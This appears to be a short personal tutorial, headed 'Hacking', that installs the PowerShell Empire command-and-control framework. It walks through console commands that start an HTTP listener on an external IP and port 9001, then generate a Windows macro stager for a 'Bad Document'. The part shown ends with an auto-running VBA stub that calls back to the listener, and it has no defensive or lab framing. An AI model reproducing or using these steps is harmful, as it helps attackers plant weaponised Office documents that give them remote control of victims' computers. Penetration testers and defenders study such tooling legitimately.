Prereq
install pip3 (python Package installer)
sudo apt install python3-pip -y
Install Poetry
sudo pip3 install poetry
install Git
sudo apt install git -y
Install Powershell - Empire
git clone --recursive https://github.com/BC-SECURITY/Empire.git
cd Empire
sudo ./setup/install.sh
sudo poetry install
sudo poetry run python empire
Hacking
generate a listener (http)
(Empire) > uselistener http
(Empire: listeners/http) > info
Name: HTTP[S]
Category: client_server
Authors:
@harmj0y
Description:
Starts a http[s] listener (PowerShell or Python) that uses a
GET/POST approach.
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
Name True http Name for the listener.
Host True http://10.128.0.15 Hostname/IP for staging.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True Port for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
[snip]
change the IP & port
(Empire: listeners/http) > set Host 34.xx.xx.xx
(Empire: listeners/http) > set Port 9001
finally execute to start listening
(Empire: listeners/http) > execute
[*] Starting listener 'http'
* Serving Flask app "http" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: off
[+] Listener successfully started!
Payload (Macro for Bad Document)
(Empire) > usestager windows/macro
(Empire: stager/windows/macro) > info
Name: Macro
...[snip]...
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
Language True powershell Language of the stager to generate.
StagerRetries False 0 Times for the stager to retry
connecting.
OutFile False File to output launcher to, otherwise
displayed on the screen
... [snip] ...
set the listener value here
(Empire: stager/windows/macro) > set Listener http
(Empire: stager/windows/macro) > execute
Sub AutoClose()
db
End Sub
Public Function db() As Variant
[snip]
